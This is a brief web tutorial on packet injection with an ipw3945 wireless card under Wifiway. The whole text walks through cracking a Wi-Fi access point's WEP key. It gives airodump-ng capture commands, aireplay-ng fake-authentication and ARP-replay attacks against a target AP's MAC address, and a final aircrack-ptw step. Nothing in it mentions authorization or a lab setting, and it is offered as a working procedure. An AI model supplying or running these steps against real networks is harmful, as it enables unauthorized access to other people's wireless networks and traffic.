| Injection of ipw3945 (Wifiway 0.6 & 0.8) |
|
|
|
First we need to change the rate and the channel of our ipw3945 adapting to match ap. To do that we will do the following, we run from the shell; ./ipw3945 It asked us for the rate, channel and bssid. Once do that we can inject as we do with other cards, but this time with a peculiarity and that is to capture use the rtap0 and to inject interface wifi0 The injection would be as follows, we run into a terminal airodump-ng rtap0 This is where we see the channel of the ap attacked, and also the bssid, then we opened another shell and we do: aireplay-ng -1 0 -e Name_of_the_ap -a mac_of_the_ap -h my_mac wifi0 And in another differently shell: aireplay-ng -3 -b mac_of_the_ap -h my_mac wifi0 Finally we opened another shell and we run the airodump-ng: airodump-ng rtap0 With this we only have to wait for the arp for de aireplay-ng shell. Finally what we have to do is; aircrack-ptw file.cap |

